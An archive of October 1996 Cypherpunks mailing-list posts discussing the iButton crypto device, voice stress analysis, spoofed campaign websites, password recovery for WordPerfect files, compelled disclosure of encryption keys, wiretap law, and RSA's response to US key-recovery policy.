copyright meter.  The multiple meters of the iButton count the usage
information over the network for easy revenue collection by the
service provider's clearinghouse," he said.
    One of the earliest anticipated uses will be by the U.S. Postal
Service, which has already notified its postal meter customers that
it will replace its current postage meters using a Postal Security
Device (PSD) connected to a PC.  Using the Cryptographic iButton as
a PSD, the USPS will be able to refill its postage meters over the
Internet.

Implementation and Availability

    The iButton is touched to a Dot Receptor which can be fitted to
any of the 200 million existing personal computers in a matter of
minutes without opening the computer's enclosure.  The Dot Receptor
is cabled to the printer port, forming a $15 pipeline to the PC.
In this way the iButton can be the physically secure co-processor to
any PC.
    Dallas Semiconductor will activate Crypotographic iButtons
issued to individuals or co-issued by service providers.  The
devices will be activated from the manufacturer's Web site.
    Dallas Semiconductor plans to begin delivering the Cryptographic
iButton and Dot Receptor in the first quarter of 1997.  The company
projects that it can drive down the cost of using its Cryptographic
iButton to $12 per year.  The street price of the Dot Receptor is
$15.  Less sophisticated versions of the iButton are currently
available.  The simplest version, the DS1990, costs $1.59 in
1,000-piece quantities.
    For more information, visit the iButton Web site at
www.iButton.com.
    Dallas Semiconductor (NYSE:DS) designs, manufactures and markets
CMOS chips and chip-based subsystems.  In its 12-year history, the
company has sold its products to more than 8,000 customers
worldwide.  These include Original Equipment Manufacturers (OEMs) in
instrumentation, factory automation, personal computers, office
equipment, telecommunications, medical equipment, and mainframe
computers.  Chips and subsystems are sold through a direct sales
force, software developers, distributors and manufacturers'
representatives worldwide.



-----------------
Robert Hettinga (rah@shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA
"'Bart Bucks' are not legal tender."
                -- Punishment, 100 times on a chalkboard,
                       for Bart Simpson
The e$ Home Page: http://www.vmeng.com/rah/






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Tue, 8 Oct 1996 08:07:54 +0800
To: cypherpunks@count04.mry.scruznet.com
Subject: Re: Voice Stress Analysis of Debates?
Message-ID: <199610071830.LAA26780@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 12:30 AM 10/7/96 -0700, cypherpunks@count04.mry.scruznet.com wrote:
>PSE/VSE etc relys  on a random 8-14 hz fm modulation appearing in the
> the 3rd formant band of the voice... the Dektor PSE retailed for 
approximately 5k in the early 1970's the hagoth hs-2 was the early 80;s for 
2k .. 

The technical details look vaguely familiar, but I probably last read them 
two decades ago.  It doesn't sound like  it would be too complicated to 
implement, with ordinary phase-lock loops, switched-capacitor filters, and 
other analog building blocks.

>I bought 2 VSE units based on a new chip for 89.95 apiece recently...
>this was on an article appearing in popular electronics in 1995

I'll  have to look that up.  Was it a DSP or some analog implementation?  
Most importantly, does it seem to WORK?  

>no software as of yet and it would be probably a FFT or DFT based algorithm 
>running on a sound blaster DSP(hardware DSP only) or as software
> on a fast 150 Mhz + pentium I can give the basic facts known... it is a truth
>detector only(not a lie detector), background music shows up a stress...
>and scrubbing the modulation shows up as constant stress or "possible 
decption"

Yes, it occurs to me that a vocorder-type compression/decompression of the 
voice would, effectively, remove FM modulation by averaging out short-term 
variations in voice frequencies.


>truth is indicated by the modualtion showing up randomly over small increments
>of time... the effect is caused by microscopic tremors of the larynx when the 
>speaker is relaxed and truthful the larnyx is relaxed and the random 
modulations
>show up,(or the speaker believes what he is saying to be the truth, when lying
>or under stress the larybx tightens and the random modulations
>disappear indicating stress... it would be  nice to have it in software...
>to run on a laptop soundboard and spread to the net as widely as pgp...

I think it's particularly revealing that the TV networks don't try to use 
it.  They're supposed to be looking for an edge, something to make the news 
seem more interesting.  The political establishment would see the 
publicizing of  this as going beyond an unwritten limitation on the media.

 
Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Tue, 8 Oct 1996 05:02:41 +0800
To: Duncan Frissell <frissell@panix.com>
Subject: "European Union Bank"
In-Reply-To: <3.0b19.32.19961007110838.00a115a0@panix.com>
Message-ID: <199610071550.LAA27746@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Duncan Frissell writes:
> >      in the world, 24 hours a day. A U.S. official said, "The
> >      bank is being investigated for violating U.S. laws with
> >      open solicitations on the Net, which is at best for tax
> >      evasion and at worst for money laundering."
> 
> I hate to tell the Feds but the internet is more of an international
> publication than "High Life" (the BA inflight mag) or the BBC World Service
> mag (whatever it's name is these days.
> 
> International publications can advertize offshore accounts and investments.

Be that as it may, but I wonder about the whole thing. EUBank's web
server appears to be firmly ensconced in Washington, D.C. -- not
exactly where one would expect their records to be kept, eh?

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alex Filacchione <alexf@iss.net>
Date: Tue, 8 Oct 1996 04:34:15 +0800
To: "skeeve@skeeve.net>
Subject: RE: Dole web site cracked?
Message-ID: <01BBB447.0E066B40@alexf.iss.net>
MIME-Version: 1.0
Content-Type: text/plain




----------
From: 	Skeeve Stevens[SMTP:skeeve@skeeve.net]
Sent: 	Monday, October 07, 1996 1:10 PM
To: 	campbell@c2.net
Cc: 	cypherpunks@toad.com
Subject: 	Re: Dole web site cracked?

You, Rick Campbell, shaped the electrons to say:
+
+So, I just finished watching the debate and at the very end, Bob Dole
+suggested that people check out www.dole-kemp.org.  I was already on
+playing decision96.digital.com so I went for it.
+
+The first page says ``Oops!  You've tried to access the old
+way.  Please choose the new way instead.''  Clicking on `new' gives a
+black background page with two yellow arrows, one left and one right.
+The left one gives you ``Nope, you can't go back now''.  The Right one
+gives you www.cg96.org, the Clinton-Gore home page.


Yeah.... definatly hacked... not much point in mirroring this one.

hmm it goes to www.dole-kemp.com which then sends it to cg96.org......
hmmmm the INTERNIC entry for dole-kemp.com looks find... and its a 
redirect,
so they prolly hacked both sites... not sure... anyone else have any
ideas?


My understanding is that everyone has been fooled.

The addresses www.dole-kemp.com and www.dole-kemp.org seem to be spoofed 
sites.  The REAL sites are www.dolekemp96.org and www.dole96.org.  These 
sites have not been touched.  Hmm, and I thought that internic was supposed 
to be watching this stuff (domain names).  I wonder if mcdonalds.org is 
still available...

Alex F
alexf@iss.net





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "I~nigo Gonzalez" <nexus@adv.es>
Date: Tue, 8 Oct 1996 12:37:13 +0800
To: dlv@bwalk.dm.com>
Subject: Best-of-Crypto (was:this list is a joke)
Message-ID: <3258D4CA.2456@adv.es>
MIME-Version: 1.0
Content-Type: text/plain


Dr.Dimitri Vulis KOTM wrote:
>
> "I~nigo Gonzalez" <nexus@adv.es> writes:
>
>> Dr.Dimitri Vulis KOTM wrote:
>>> When I joined this mailing list, it had plenty of technical discussions
>>> posted by people knowledgeable in cryptography. They have all since left.
>>
>> Where did they go?????? I want to read something _good_ not spam.
>> What about coderpunks ????
>
> There's some interesting discussion on coderpunks, but it's pretty
> low-volume. There used to be interesting threads on cypherpunks -
> I'm not awarae of any place where they continue.
>

Maybe we can build here (at adv.es) a Best-Of-Crypto mailing list...
with the _same_ spirit we have now Best-Of-Security... 
I mean technical, relevant postings...

Any comments ???
--
  Iñigo González - ADV Internet Technical Advisor <nexus@adv.es>
  "Never say anything online that you wouldn't want to see on the
  front page of The New York Times." - alt.2600.moderated Posting






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Timothy C. May" <tcmay@got.net>
Date: Tue, 8 Oct 1996 08:45:23 +0800
To: jim bell <cypherpunks@toad.com
Subject: Re: Can somebody unsubscribe cyberpromo from CP?
In-Reply-To: <199610071724.KAA20735@mail.pacifier.com>
Message-ID: <v03007811ae7f163b5cc0@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain


At 10:23 AM -0800 10/7/96, jim bell wrote:
>I think somebody subscribed that Cyberpromo organization to the Cypherpunks
>list.  It needs to be unsubscribed...
>

"I have a solution."


--Tim


"The government announcement is disastrous," said Jim Bidzos,.."We warned IBM
that the National Security Agency would try to twist their technology."
[NYT, 1996-10-02]
We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1,257,787-1 | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Burroughs <richieb@teleport.com>
Date: Tue, 8 Oct 1996 09:08:12 +0800
To: cypherpunks@toad.com
Subject: Re: Can somebody unsubscribe cyberpromo from CP?
Message-ID: <3.0b24.32.19961007121953.00691268@mail.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


At 10:23 AM 10/7/96 -0800, jim bell <jimbell@pacifier.com> wrote:
>I think somebody subscribed that Cyberpromo organization to the Cypherpunks 
>list.  It needs to be unsubscribed...

I did a "who" and didn't see them.  Maybe someone already took care of it...

BTW, the messages I was receiving from "abusebot@savetrees.com" were sent
to me, not the list.  I wrote the address in their email and was told that
apparently someone was forging notes to their "abuse" address from mine --
the information about reporting abuses, etc, comes back in response.  I was
told the messages would be blocked, but I'm not sure if it happened as I'm
now filtering them.


Rich

______________________________________________________________________
Rich Burroughs  richieb@teleport.com  http://www.teleport.com/~richieb
See my Blue Ribbon Page at http://www.teleport.com/~richieb/blueribbon
U.S. State Censorship Page at - http://www.teleport.com/~richieb/state
New EF zine "cause for alarm" - http://www.teleport.com/~richieb/cause




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Burroughs <richieb@teleport.com>
Date: Tue, 8 Oct 1996 09:07:38 +0800
To: cypherpunks@toad.com
Subject: Re: Dole web site cracked?
Message-ID: <3.0b24.32.19961007123508.0070844c@mail.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


At 10:08 AM 10/7/96 -0500, "Bruce M." <bkmarsh@feist.com> wrote:
>On Mon, 7 Oct 1996, Black Unicorn wrote:
>
>> Actually, on further examination, looks like a cute little spoof, not a
>> hack.
>> 
>> The address for the actual dole page is : www.dolekemp96.org
>
>    But, which one of these DNS entries looks more official?
[snip]

Heh.  

www.dolekemp96.org is definitely the address Dole gave at the close of the
debate.  The fact that the billing contact and one of the domain servers
are at "getcaught.com" is perhaps just a fine bit of irony...

I tried to connect to www.getcaught.com with no success, so I'm not sure
what's there...


Rich


______________________________________________________________________
Rich Burroughs  richieb@teleport.com  http://www.teleport.com/~richieb
See my Blue Ribbon Page at http://www.teleport.com/~richieb/blueribbon
U.S. State Censorship Page at - http://www.teleport.com/~richieb/state
New EF zine "cause for alarm" - http://www.teleport.com/~richieb/cause




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Tue, 8 Oct 1996 09:41:41 +0800
To: "Timothy C. May" <cypherpunks@toad.com
Subject: Re: You can be forced to turn over your encryption keys?
Message-ID: <199610072024.NAA07290@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 10:17 AM 10/7/96 -0800, Timothy C. May wrote:
>At 10:33 AM -0400 10/7/96, Geoffrey C. Grabow wrote:
>>I thought we had a 5th amendment.  Isn't turning over your key that may (or
>>may not) expose encriminating evidence an extension of self-encrimination?
>>Haven't there been dozens of famous witnesses (Patty Hurst, Oliver North,
>>etc) that "take the 5th" dozens of times on the stand.  Why couldn't I
>>"take the 5th" when asked for my encryption keys?  When asked for your key,
>>can't you say: "I'm sorry your honor, but I respectfully refuse to answer
>>that question on the grounds that it may incriminate me.".

>Though IANAL, I know of many, many discussions of this question. So far as
>I know, it remains one of The Great Unresolved Questions.
  

I think that there was an idea that appeared in the last few months around 
here, which took advantage of the fact that a one-time pad makes all 
decrypts equally likely.  If the cops sieze an apparently-encrypted file and 
they insist on the key, just ask them to give you the file back (although 
presumably you already had it) and present them with the OTP, revealing the 
fact (surprise!!!) that the thing decrypts to (for just one example) the 
first "N" bytes of the King James Bible, or the Cybernomicon, or "War and 
Peace" or the stock exchange results for August 1, 1989, etc...

This suggests that there is a reason to have a program which uses OTP 
techniques but generates files which "look like" valid PGP output. The judge 
can't force you to reveal what you don't know, but more importantly if you 
give him a "key" that might be the correct one, and assuming it is 
impossible to prove that it wasn't the correct key, then it would be 
somewhat pointless and certainly unjustified for him to continue to insist 
on providing yet another key.






Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <rich@c2.org>
Date: Tue, 8 Oct 1996 11:34:09 +0800
To: cypherpunks@toad.com
Subject: Seeking help on WordPerfect 6.1 cracks
Message-ID: <Pine.GUL.3.95.961007132450.9362A-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Among the possessions of a murder victim (not suspect), the local police
have found a floppy disk with some provocative-sounding files on it. Rather
than getting them into the habit of cracking other people's personal files,
I'd prefer to give them the password myself, but there seems to be no freely
available cracker for WordPerfect 6.x, and I'm not sure this one-time use is
worth $100 to me. Can anyone lend a hand? Just four small files. I can give
you more than enough details off the list to assure you that this is totally
on the level. Feel free to discuss the implications of providing such help. 

Failing that, does anyone have a technical, political, or personal
preference for or against AccessData or CRAK, who sell the two commercial
crackers I've found?

- -rich
 [not on cypherpunks at the moment]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQBVAwUBMllpfZNcNyVVy0jxAQHtcgH8D3oW21nsaNrIHxHMqhxE/Ho9/78L1elF
DYHV3jeM4VSqTP6cKhMn5ZahB4b8KP9t7EG70NAtwn/usaKiWpw92Q==
=uq4u
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Tue, 8 Oct 1996 05:47:36 +0800
To: Eric Murray <ericm@lne.com>
Subject: Re: "European Union Bank"
In-Reply-To: <199610071736.KAA21570@slack.lne.com>
Message-ID: <199610071740.NAA28178@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Eric Murray writes:
> Perry E. Metzger writes:
> > Be that as it may, but I wonder about the whole thing. EUBank's web
> > server appears to be firmly ensconced in Washington, D.C. -- not
> > exactly where one would expect their records to be kept, eh?
> 
> I noticed that too.  Is this BCCI 2, or just a front that the forces
> of repression can use to say "look, there is money-laundering
> on the Internet!  We must control it."

Or, perhaps, they are just a way for the IRS to get the names of lots
of people interested in offshore banking. Or maybe not. Who knows?

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Tue, 8 Oct 1996 05:50:20 +0800
To: cypherpunks@toad.com
Subject: Bellcore Smart Card Hack
Message-ID: <1.5.4.16.19961007174329.2e979a3a@pop.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


There is more info on Bellcore's research on flawed smart cards at:

     http://www.bellcore.com/PRESS/ADVSRY96/medadv.html

with links to facts of the crypto hack.

-----

Thanks to Mr. Ken Bransom at Bellcore.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Back <aba@dcs.ex.ac.uk>
Date: Wed, 9 Oct 1996 08:26:49 +0800
To: jimbell@pacifier.com
Subject: Re: Voice Stress Analysis of Debates?
In-Reply-To: <199610061727.KAA18789@mail.pacifier.com>
Message-ID: <199610071256.NAA00126@server.test.net>
MIME-Version: 1.0
Content-Type: text/plain



Jim Bell <jimbell@pacifier.com> writes:
> One thing I wonder is this:  Can the stress indications be removed from a 
> voice-containing signal by some sophisticated DSP processing?  

Not very sophisticated, but cheap current technology:

  high end PC soundcard, dictation software, to convert speech to text,
  then speech synthesis software to put that back into speech.

Of course pauses in speech, and the actual words and positions taken
show through, and these doubtless contain cues, as does body language.

I thought that perhaps speech synthesis (so that you could type) or
both speech recognition, followed by speech synthesis, together with
PGPfone, and a high bandwidth TCP packet `remailer' might be a fun
application.  Plus a gateway back in to the phone system, paid for by
ecash (double blinded ecash).

All doable currently, I think.  With sufficient users of the remailer,
you should be able to get packet lag down, and still converse
relatively interactively anonymously.  Better than a pay phone, your
link could be encrypted to the remailer with a forward secret protocol
(PGPfone is forward secret), even if the recipient was using an
ordinary phone.

Talking about attempting to discover whether politicians are lying
(apart from `at all times by definition'), it seems that even if a
highly accurate lie detector were developed, puppet politicians could
be kept ignorant, and fed the info to discuss, so that they could tell
untruths without knowing they were untruths, and so better pass
analysis.

Also some pathological liars apparently can do well at lie detectors
because they are so used to lying that they can lie with no
compunction.  Successful politicians would be selected from those who
possess such qualities.  (One suspects most are pretty good already,
in any case)

Adam
--
#!/bin/perl -sp0777i<X+d*lMLa^*lN%0]dsXx++lMlN/dsM0<j]dsj
$/=unpack('H*',$_);$_=`echo 16dio\U$k"SK$/SM$n\EsN0p[lN*1
lK[d2%Sa2/d0$^Ixp"|dc`;s/\W//g;$_=pack('H*',/((..)*)$/)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Greg Broiles <gbroiles@netbox.com>
Date: Tue, 8 Oct 1996 12:31:38 +0800
To: "Geoffrey C. Grabow" <gcg@pb.net>
Subject: Re: You can be forced to turn over your encryption keys?
Message-ID: <3.0b28.32.19961007141327.0074af18@ricochet.net>
MIME-Version: 1.0
Content-Type: text/plain


At 10:33 AM 10/7/96 -0400, Geoffrey C. Grabow wrote:

>I thought we had a 5th amendment.  Isn't turning over your key that may (or
>may not) expose encriminating evidence an extension of self-encrimination?

As Tim notes, this has been discussed several times. You might take a look at:

Greg S. Sergienko, Self Incrimination and Cryptographic Keys, 2 RICH. J.L.
& TECH. 1 (1996), <http://www.urich.edu/~jolt/v2i1/sergienko.html>. 


--
Greg Broiles                |  "We pretend to be their friends,
gbroiles@netbox.com         |   but they fuck with our heads."
http://www.io.com/~gbroiles |
                            |





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Arachelian <sunder@brainlink.com>
Date: Tue, 8 Oct 1996 07:59:23 +0800
To: "Dr.Dimitri Vulis KOTM" <dlv@bwalk.dm.com>
Subject: Re: Voice Stress Analysis of Debates?
In-Reply-To: <7P2DVD35w165w@bwalk.dm.com>
Message-ID: <Pine.SUN.3.91.961007141640.27539C-100000@beast.brainlink.com>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 6 Oct 1996, Dr.Dimitri Vulis KOTM wrote:

> Q: How can you tell that Timmy May is posting lies, personal attacks, and
>    religious war flame bait?
> 
> A: He posts them to cypherpunks.

Said Vulis while wearing ten pounds of mascara, four pounds of lipstick, 
a bra filled with miniature mandarin oranges, and not much else.

=============================================================================
 + ^ + |  Ray Arachelian    |FL|       KAOS KERAUNOS KYBERNETOS      |==/|\==
  \|/  |sunder@brainlink.com|UL|__Nothing_is_true,_all_is_permitted!_|=/\|/\=
<--+-->| ------------------ |CG|What part of 'Congress shall make no |=\/|\/=
  /|\  | "A toast to Odin,  |KA| law abridging the freedom of speech'|==\|/==
 + v + |  God of pretzles!" |AK|        do you not understand?       |=======
===================http://www.brainlink.COM/~sunder/=========================
           ActiveX! ActiveX! Format Hard drive? Just say yes!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Tue, 8 Oct 1996 10:08:56 +0800
To: Greg Broiles <gbroiles@netbox.com>
Subject: Re: legality of wiretapping: a "key" distinction
In-Reply-To: <3.0b28.32.19961006163919.00700398@ricochet.net>
Message-ID: <199610072122.OAA21916@netcom22.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



>Also, there is an important difference between making a policy argument or
>expressing a preference, e.g.:
>
>"I like having a choice between disclosing information which is requested
>and suffering the penalties for contempt of court"
>
>and an argument about the constitution:
>
>"The constitution says I must be given a choice between disclosing and
>contempt." 
>
>I don't remember seeing any examples of the latter come across the list. As
>I remember things, the context of my statement above was a discussion of
>why third-party key escrow is not the same as self-escrow. 

the point is that many cpunks feel that  warrants and wiretaps and
subpoenas are things to defy. it's a hypocritical double standard
in which they cloth themselves in the wrapping of the constitution
or law whenever it is useful to their arguments, and then advocate criminality,
such as via defying legal warrants etc, whenever the case suits them.

[wiretaps]

>It's rarely quoted here because it is unremarkable; just as the list is not
>a place for basic crypto education, it is not a place for basic legal
>education. 

ooops, you fell for Unicorn's muddying misstatement of my question. OBVIOUSLY
there is lots of case law on wiretaps. what I was trying to point out
was that I find little discussion of cases here trying to discredit
wiretap law for various reasons, such as that the wiretapped
person is not informed. the distinction of the person *not*being*informed*
of the wiretap is very important as otehrs here agree, and I would
expect everyone would be familiar with a simple case that gives a 
decision on it (in much the way many constitutional cases are
regularly quoted) or that people would advocate wiretap law would
be challenged on the basis of the lack of such a precedent case.

>As Brian Davis and Uni have pointed out, people who keep current enough on
>legal topics to be able to give you a good answer will probably want to get
>paid for doing so. Saying "here's a legal argument that I made up in the
>shower. what do you guys think of it?" and expecting a detailed explanation
>of why it's good or bad is the same as saying "here's my new crypto
>algorithm that I thought of in the shower, what do you guys think of it?". 

no, all I am asking for is lawyers who are familiar with wiretap law
to make a quick case against it based on a commonly-known precedent
within their field. if you don't want to answer, don't post. (Unicorn
is free to flame his testicles off as usual.)

>Merely asking the question "Is there case law on wiretaps?" suggests that
>an answer which includes references will be wasted on you.

that's an absurd paraphrase of my post. I was focusing on case law
that had certain characteristics-- a simple case that challenged the
validity of wiretapping based on the fact that the participant is
not informed such as with other forms of retrieving evidence
utilized by the court.

>Go to a law library or larger general library and ask the librarian to show
>you where the annotated copy of 18 USC 2510 is. Read the statute. Read the
>legislative history. Read the annotations. Read the cases which were
>annotated. Repeat this process until you reach 18 USC 2709 or die of boredom.

I will write on anything I damn well please and research it poorly or
thoroughly as I like, and whisper questions to any lawyers out there who care
to talk about the subject to an interested layman.

>(The answer to most of the "how do I find out about 'X'?" questions

you have a lot of good advice, but I ask none of the things you are
attributing to me. I simply would like to carry on a discussion with
a civilized lawyer who specializes in the subject, rather than have
a people tell me why I cannot even do this, and must become a law
specialized before I can even use the word "wiretap" with any 
meaningfulness.

the chief point of my post was to question why the EFF etc. are not
at all interested in challenging the wiretap "status quo" in spite
of what many people here believe/advocate-- that wiretapping was
never legitimate in the first place. this is curious because EFF
etc. *are* willing to back up the cryptography cases out there,
ala Bernstein etc.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Stanton McCandlish <mech@eff.org>
Date: Tue, 8 Oct 1996 11:03:22 +0800
To: cypherpunks@toad.com
Subject: Libel & Pseudonymous Reputation - permissions fixed!
Message-ID: <199610072125.OAA16776@eff.org>
MIME-Version: 1.0
Content-Type: text/plain


Sorry about that. The file is available now.

http://www.eff.org/pub/Legal/CyberLaw_Course/cyberlaw.038

--
<HTML><A HREF="http://www.eff.org/~mech">     Stanton McCandlish
</A><HR><A HREF="mailto:mech@eff.org">        mech@eff.org
</A><P><A HREF="http://www.eff.org">          Electronic Frontier Foundation
</A><P>      Program Director    </HTML>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <rich@c2.org>
Date: Tue, 8 Oct 1996 16:39:32 +0800
To: cypherpunks@toad.com
Subject: Re: Seeking help on WordPerfect 6.1 cracks
In-Reply-To: <Pine.GUL.3.95.961007132450.9362A-100000@Networking.Stanford.EDU>
Message-ID: <Pine.GUL.3.95.961007142325.10014A-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Mon, 7 Oct 1996, Rich Graves wrote:

> Among the possessions of a murder victim (not suspect), the local police
> have found a floppy disk with some provocative-sounding files on it. Rather
> than getting them into the habit of cracking other people's personal files,
> I'd prefer to give them the password myself, but there seems to be no freely
> available cracker for WordPerfect 6.x, and I'm not sure this one-time use is
> worth $100 to me. Can anyone lend a hand? Just four small files. I can give
> you more than enough details off the list to assure you that this is totally
> on the level. Feel free to discuss the implications of providing such help. 

I should have mentioned that I have copies of the encrypted files, which
could be HTTP'd or MIME'd to you anonymously if you like, though I'd prefer 
getting help from someone I trust, because at this point we don't know the
potential value or danger of the files. 

- -rich

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQBVAwUBMll105NcNyVVy0jxAQEDTwIAmVtiZMBsHeHJzogZ1nbTOZSVY0nS2aZG
twWRpZTVJn6xcMHZd2kXk8aLsmOPRTTB83eLq0V7XwrUBf1VLOMh7Q==
=5wsD
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Tue, 8 Oct 1996 07:34:54 +0800
To: Brian Davis <unicorn@schloss.li>
Subject: Re: The Great Reducer: Line of the Year
Message-ID: <3.0b19.32.19961007143221.00a201e0@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


At 11:02 AM 10/7/96 -0400, Brian Davis wrote:
>> > I'm 
>> > well aware that the SC disagrees, but that is simply because they are 
>> > entirely wrong in this matter.
>
>
>Well then, it is a good thing we have Mr. Bell here to set us all straight!
>
>EBD

The Supremes frequently err (Hugo Black's decision in Korematsu vs U.S. par
example).  In a larger sense, the existance of an entity like the Supreme
Court will probably become generally recognized as "wrong" as we transition
to non coercive methods of social organization.

Slavery and bleeding were once considered natural and appropriate.   

DCF




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Tue, 8 Oct 1996 12:08:00 +0800
To: cypherpunks@toad.com
Subject: Re: Can somebody unsubscribe cyberpromo from CP?
In-Reply-To: <199610071724.KAA20735@mail.pacifier.com>
Message-ID: <763FVD19w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


jim bell <jimbell@pacifier.com> writes:

> I think somebody subscribed that Cyberpromo organization to the Cypherpunks
> list.  It needs to be unsubscribed...

As usual, Timmy May is the prime suspect.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Tue, 8 Oct 1996 14:29:40 +0800
To: Simon Spero <ses@tipper.oit.unc.edu>
Subject: Re: Can somebody unsubscribe cyberpromo from CP?
Message-ID: <199610072311.QAA22654@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 05:43 PM 10/7/96 -0400, Simon Spero wrote:
>On Mon, 7 Oct 1996, Timothy C. May wrote:
>
>> At 10:23 AM -0800 10/7/96, jim bell wrote:
>> >I think somebody subscribed that Cyberpromo organization to the Cypherpunks
>> >list.  It needs to be unsubscribed...
>> 
>> "I have a solution."
>> 
>
>[Looks through pockets] - 7 Zlotys, 1.5 DM, and 1.20 GBP says October 
>21st, in the library, bludgeoning to death with 20lbs of junk mail

Your code name is "Col. Mustard."


Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@cypherpunks.ca (John Anonymous MacDonald)
Date: Tue, 8 Oct 1996 16:05:11 +0800
To: 2600@ninja.techwood.org
Subject: (fwd) RSA on GAK
Message-ID: <199610072338.QAA03488@abraham.cs.berkeley.edu>
MIME-Version: 1.0
Content-Type: text/plain


RSA Optimistic on User Benefits of Administration's Recent Key Recovery
Initiative Announcement; Further policy change required for U.S. vendors
to be competitive worldwide 

Source: Business Wire 

REDWOOD CITY, Calif.--(BUSINESS WIRE) via Individual Inc. -- RSA Data
Security Inc., a wholly-owned subsidiary of Security Dynamics
Technologies Inc. (NASDAQ:SDTI), issued the following comments on the
administration's recent announcement of a Key Recovery Initiative: 

The administration's proposed Key Recovery Initiative is a positive step
towards meeting the needs of individuals and organizations that buy and
use products which utilize encryption. However, the proposal leaves
significant competitive issues unresolved for suppliers who compete
overseas. 

Modern encryption and authentication technologies are crucial to the
growth of electronic commerce and the health of the future global
electronic economy. The continued leadership of American computer and
software firms in the world market depends on their ability to provide
competitive solutions for consumers and businesses around the world. 

These consumers and businesses depend increasingly on encryption and
authentication technologies -- such as those developed at RSA -- to
provide solutions that protect the privacy of consumer purchases,
personal medical information, sensitive corporate data, and electronic
commerce and funds transfers as they travel over the global Internet. 

U.S. government agencies, however, have long insisted that they must
have potential access to all encrypted information for law enforcement
purposes, and have advanced several proposals toward those ends. 

To date, these proposals have met with little support from the user and
vendor communities due to concerns about privacy and competitiveness.
This new proposal from the administration, however, is a move in the
right direction for users. 

One positive step is that the administration has indicated, for the
first time in over six years of discussion, that it will lift all key
size restrictions on the export of products which utilize cryptography,
provided that manufacturers provide a viable means of key recovery for
legitimate government access. 

In addition, under the administration's proposal, industry, not
government, will develop and propose the actual key recovery mechanisms.
This will result in more effective solutions to managing and recovering
keys. 

Finally, the proposal addresses the concerns of users that any third
party designated to hold user keys might improperly disclose those keys,
thereby compromising a user's right to privacy. The administration has
agreed that under certain circumstances, organizations would be allowed
to "self-escrow" their own encryption keys. 

RSA is confident that industry can develop and gain approval for several
excellent key recovery mechanisms that would be acceptable to government
concerns. In fact, RSA has been a pioneer in this field with our RSA
Emergency Access technology in its award-winning RSA SecurPC product. 

In the case of SecurPC, companies using the product can use Emergency
Access keys with RSA's unique secret-splitting technology to gain access
to critical information in the event of an emergency. 

The recently announced Key Recovery Alliance, of which RSA is a part, is
chartered to provide a flexible, workable solution for users working
within the government's proposed key recovery framework. Members of the
group are working on technology which will allow users to maintain the
privacy of their keys while allowing legitimate business or law
enforcement authorities to recover keys when appropriate. 

It will also address challenges that arise when a user must comply with
the differing encryption policies in countries around the world. The
technology could allow products to provide the flexibility a user needs
to take full advantage of the maximum privacy allowed in their locality,
